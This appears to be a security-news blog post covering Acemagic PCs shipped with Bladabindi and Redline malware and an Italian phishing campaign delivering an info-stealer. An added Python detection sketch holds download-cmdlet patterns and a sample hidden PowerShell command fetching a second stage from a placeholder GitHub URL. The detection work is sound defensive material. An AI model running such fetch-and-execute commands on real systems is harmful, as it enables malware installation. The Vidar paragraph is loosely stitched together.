
This Chinese PC Manufacturer Tailored its Own Devices to be Susceptible to Malware


Acemagic, a Chinese manufacturer of personal computers, has acknowledged that certain products were shipped with pre-installed malware.

The discovery was made by a YouTuber known as The Net Guy, who encountered malware on Acemagic mini PCs during testing in early February. The malware, identified as Bladabindi, was detected by Windows Defender shortly after booting the machine. Bladabindi is a well-known backdoor that can steal user information and facilitate the installation of other malicious software.

Recently, Acemagic confirmed that some of its PCs were indeed infected with Bladabindi and also raised concerns about the potential presence of another malware called Redline. Redline is capable of stealing information from web browsers, conducting system inventories, and even pilfering cryptocurrency.

Acemagic's explanation for the malware's presence was somewhat perplexing and inconsistent. Initially, the company attributed the issue to adjustments made by software developers to enhance user experience by reducing boot time, which inadvertently affected network settings and omitted digital signatures. However, in a subsequent statement to The Register, the company mentioned that the incident stemmed from similar software adjustments made by developers.

The company has pledged to bolster its use of digital certificates to prevent unauthorized modifications, hinting that external parties might have accessed its machines or its master copy of Windows to deliver the malware.

It remains uncertain whether the infections occurred at the factory or after the PCs were in the possession of their new owners. Acemagic has announced plans to refund the cost of machines manufactured between September and November 2023 and has advised owners to check the stickers affixed to their models for the date of manufacture.

Interestingly, just before The Register received Acemagic's acknowledgment of the malware issue, they received a review unit of one of its PCs. However, the labels on that unit did not contain information about the date of manufacture, nor did the QR codes provide such details.

Acemagic has provided clean system images for owners to disinfect their machines and is offering a 25 percent purchase price rebate for those who do so. Additionally, owners of infected machines can apply for a voucher providing a ten percent discount on any future Acemagic purchase, though it remains to be seen if customers will trust the brand after this incident.

Italian Users Warned of New Info-Stealer Malware Campaign


The Uptycs Threat Research team has revealed a new malware campaign targeting Italy with phishing attacks in order to deploy information-stealing malware on victims' Windows systems.

According to Uptycs security researcher Karthickkumar Kathiresan, the malware campaign is designed to acquire sensitive information such as system details, cryptocurrency wallet information, browser histories, cookies, and the login credentials of crypto wallets.

Details of the Campaign 

  • The multi-stage infection sequence begins with an invoice-themed phishing email containing a link that downloads a password-protected ZIP archive. The archive holds two files: a shortcut (.LNK) file and a batch (.BAT) file.
  • Regardless of which file the victim opens, the attack chain is the same: a batch script is fetched that installs an information-stealing payload from a GitHub repository. This is done using a legitimate PowerShell binary that is itself also retrieved from GitHub.
  • Once installed, the C#-based malware gathers system metadata and information from a variety of web browsers and cryptocurrency wallets, then transfers that data to an actor-controlled domain.
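The chain above leaves a recognisable footprint in process-creation telemetry: a batch stage launching a PowerShell binary that downloads from GitHub, often from a non-standard path because the binary itself was fetched rather than shipped with Windows. The following detection sketch is an added example, not code from Uptycs or from the original post. It scores constructed process events (modelled loosely on the fields a Sysmon Event ID 1 record carries; the field names, sample paths and the GitHub URL are assumptions and placeholders) and flags an event only when at least two independent indicators line up, so that ordinary PowerShell use or a developer's build script is not flagged on its own.

```python
"""Added example (not part of the original post): flag process-creation
events that match a batch-stage -> PowerShell -> GitHub-download chain.
Event shape and all sample values below are constructed assumptions."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (field names are an assumption)."""
    event_id: int
    parent_image: str          # full path of the parent process
    parent_command_line: str   # command line of the parent process
    image: str                 # full path of the new process
    command_line: str          # command line of the new process


# Image name of a PowerShell host, wherever it sits on disk.
POWERSHELL = re.compile(r"(?:^|\\)(?:powershell|pwsh)\.exe$", re.IGNORECASE)
# Download from a GitHub-hosted URL.
GITHUB_URL = re.compile(r"https?://(?:raw\.githubusercontent\.com|github\.com)/", re.IGNORECASE)
# Cmdlets / .NET calls commonly used to fetch content from PowerShell.
DOWNLOAD_HINT = re.compile(
    r"\b(?:Invoke-WebRequest|iwr|curl|wget|DownloadString|DownloadFile|Net\.WebClient)\b",
    re.IGNORECASE,
)
# Directories where Windows itself installs PowerShell (lower-cased for comparison).
STANDARD_PS_DIRS = (
    "c:\\windows\\system32\\windowspowershell\\v1.0\\",
    "c:\\windows\\syswow64\\windowspowershell\\v1.0\\",
    "c:\\program files\\powershell\\",
)


def indicators(ev: ProcEvent) -> list[str]:
    """Return the names of every chain indicator the event matches."""
    found = []
    is_ps = bool(POWERSHELL.search(ev.image))
    if is_ps and not ev.image.lower().startswith(STANDARD_PS_DIRS):
        found.append("powershell_nonstandard_path")
    if GITHUB_URL.search(ev.command_line) and DOWNLOAD_HINT.search(ev.command_line):
        found.append("download_from_github")
    if ev.parent_image.lower().endswith("cmd.exe") and ".bat" in ev.parent_command_line.lower():
        found.append("batch_stage_parent")
    return found


def flag_stealer_chain(events: list[ProcEvent], min_indicators: int = 2) -> dict[int, list[str]]:
    """Map event_id -> indicators for events with at least min_indicators hits."""
    flagged = {}
    for ev in events:
        hits = indicators(ev)
        if len(hits) >= min_indicators:
            flagged[ev.event_id] = hits
    return flagged


# Constructed sample telemetry: three benign-looking events and one matching the chain.
PS_STD = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(1, "C:\\Windows\\explorer.exe", "explorer.exe", PS_STD,
              "powershell.exe -NoProfile"),
    ProcEvent(2, "C:\\Windows\\System32\\cmd.exe", "cmd.exe /c build.bat", PS_STD,
              "powershell.exe -c git status"),
    ProcEvent(3, "C:\\Windows\\System32\\cmd.exe",
              "cmd.exe /c C:\\Users\\u\\AppData\\Local\\Temp\\fattura\\fattura.bat",
              "C:\\Users\\u\\AppData\\Local\\Temp\\fattura\\pwsh.exe",
              "pwsh.exe -w hidden -c Invoke-WebRequest "
              "https://raw.githubusercontent.com/EXAMPLE-ORG/EXAMPLE-REPO/main/stage2.bat "
              "-OutFile stage2.bat"),   # URL is a placeholder, not a real repository
    ProcEvent(4, "C:\\Windows\\explorer.exe", "explorer.exe", PS_STD,
              "powershell.exe -c iwr https://github.com/EXAMPLE-ORG/tool/releases/latest -OutFile t.zip"),
]

if __name__ == "__main__":
    for event_id, hits in flag_stealer_chain(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(hits)}")
```

Only event 3 is reported: it combines a batch-file parent, a PowerShell host running from a temp directory, and a GitHub download in one record. Event 4 downloads from GitHub with the stock PowerShell and event 2 runs PowerShell from a build batch file; each trips a single indicator and stays below the threshold, which is the point of requiring two.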

Info-stealers You Should Beware of

Vidar stealer: It resurfaced with sophisticated tactics that abuse popular platforms such as Telegram, Mastodon, TikTok, and Steam. Back in December 2022, numerous information stealers were discovered targeting the PyPI repository: 16 packages, each downloaded more than 100 times, were found to be distributing ten different stealer variants.

In today’s world of cybercrime, which is constantly evolving, one of the most severe forms of malware that one must beware of is the info-stealer. This covert digital burglar may sneak into your devices and networks to steal sensitive information, consequently rendering you vulnerable to identity theft, financial fraud, or more devastating repercussions. 

To protect against info-stealer attacks, Uptycs advises updating passwords regularly and employing robust security controls with multi-layered visibility and security solutions.